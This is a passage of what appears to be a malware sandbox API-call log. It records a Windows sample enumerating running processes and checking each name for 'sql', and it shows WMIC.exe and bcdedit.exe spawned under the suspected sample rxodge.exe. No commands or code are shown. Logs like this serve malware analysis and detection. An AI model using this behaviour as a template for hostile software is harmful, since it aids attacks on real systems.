lpUsedDefaultChar=0x0) returned 20 [0153.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0153.672] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="sql") returned 0x0 [0153.672] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0153.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0153.672] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583f20 [0153.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3583f20, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0153.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0153.673] StrStrIA (lpFirst="utg2.exe", lpSrch="sql") returned 0x0 [0153.673] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0153.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.674] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35840e8 [0153.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x35840e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0153.674] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0153.674] StrStrIA (lpFirst="saying.exe", lpSrch="sql") returned 0x0 [0153.674] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0153.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0153.675] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583f80 [0153.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3583f80, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0153.675] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0153.675] StrStrIA (lpFirst="ripe.exe", lpSrch="sql") returned 0x0 [0153.675] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0153.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.676] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584100 [0153.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3584100, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0153.676] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0153.676] StrStrIA (lpFirst="acoustic.exe", lpSrch="sql") returned 0x0 [0153.676] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0153.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0153.677] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3583f98 [0153.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3583f98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0153.677] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0153.677] StrStrIA (lpFirst="mail.exe", lpSrch="sql") returned 0x0 [0153.677] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0153.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.678] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3583f38 [0153.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3583f38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0153.678] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0153.678] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="sql") returned 0x0 [0153.678] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.679] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584118 [0153.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3584118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0153.679] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0153.679] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0153.679] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0153.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.680] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584058 [0153.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3584058, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0153.680] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0153.680] StrStrIA (lpFirst="dllhost.exe", lpSrch="sql") returned 0x0 [0153.680] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0153.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.681] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3584130 [0153.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3584130, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0153.681] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0153.681] StrStrIA (lpFirst="taskhostw.exe", lpSrch="sql") returned 0x0 [0153.681] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0153.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.685] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35843b8 [0153.685] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x35843b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0153.686] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0153.686] StrStrIA (lpFirst="UsoClient.exe", lpSrch="sql") returned 0x0 [0153.686] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0153.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0153.687] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3596d28 [0153.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3596d28, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0153.687] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0153.687] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="sql") returned 0x0 [0153.687] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0153.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0153.841] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596ac8 [0153.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3596ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0153.841] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0153.841] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="sql") returned 0x0 [0153.841] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0153.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0153.842] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3585800 [0153.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x3585800, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0153.843] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0153.843] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="sql") returned 0x0 [0153.843] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.844] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584220 [0153.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3584220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0153.844] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0153.844] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0153.844] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.845] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35844c0 [0153.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35844c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0153.846] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0153.846] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0153.846] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0153.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.847] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3584268 [0153.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3584268, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0153.847] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0153.847] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0153.847] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0153.848] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35844d8 [0153.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35844d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0153.848] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0153.848] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0153.849] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0153.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.850] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596b48 [0153.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3596b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0153.850] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0153.850] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0153.850] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0153.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.851] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3584238 [0153.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3584238, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0153.851] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0153.851] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0153.851] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0153.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0153.853] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3584418 [0153.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x3584418, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIC.exe", lpUsedDefaultChar=0x0) returned 9 [0153.853] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIC.exe" | out: lpString1="WMIC.exe") returned="WMIC.exe" [0153.853] StrStrIA (lpFirst="WMIC.exe", lpSrch="sql") returned 0x0 [0153.853] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x380, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.855] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35843a0 [0153.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35843a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0153.855] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0153.855] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0153.855] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcdedit.exe")) returned 1 [0153.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bcdedit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.856] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584460 [0153.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bcdedit.exe", cchWideChar=-1, lpMultiByteStr=0x3584460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcdedit.exe", lpUsedDefaultChar=0x0) returned 12 [0153.856] lstrcpyA (in: lpString1=0x567fabc, lpString2="bcdedit.exe" | out: lpString1="bcdedit.exe") returned="bcdedit.exe" [0153.856] StrStrIA (lpFirst="bcdedit.exe", lpSrch="sql") returned 0x0 [0153.856] Process32NextW (in: hSnapshot=0x374, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1028, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0153.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0153.858] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3584478 [0153.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3584478, 